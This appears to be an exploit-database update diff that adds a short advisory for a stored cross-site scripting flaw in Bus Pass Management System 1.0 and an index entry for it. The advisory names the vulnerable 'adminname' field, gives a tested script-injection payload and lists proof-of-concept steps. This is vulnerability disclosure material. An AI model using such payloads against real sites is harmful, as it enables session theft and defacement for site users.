DB: 2021-09-10

1 changes to exploits/shellcodes

Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)

exploits/php/webapps/50272.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
+# Date: 2021-09-08
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
+# Version: 1.0
+# Tested on: Windows 11 - XAMPP Server
+
+# Vulnerable page: host/admin/*
+
+# Vulnerable Code: <div class="user-info"><div><strong>Admin[PAYLOAD]</strong></div>
+
+# Vulnerable Parameter: adminname[ POST Data ]
+
+# Tested Payload: <svg/onload=alert('XSS')>
+
+# Proof Of Concept:
+
+# 1 - Login the dashboard
+# 2 - Go to /admin/admin-profile.php
+# 3 - set admin name with payload
+# 4 - xss fires

files_exploits.csv

@@ -44393,3 +44393,4 @@ id,file,description,date,author,type,platform,port
 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
 50270,exploits/php/webapps/50270.txt,"WordPress Plugin TablePress 1.14 - CSV Injection",1970-01-01,"Nikhil Kapoor",webapps,php,
+50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",1970-01-01,"Emre Aslan",webapps,php,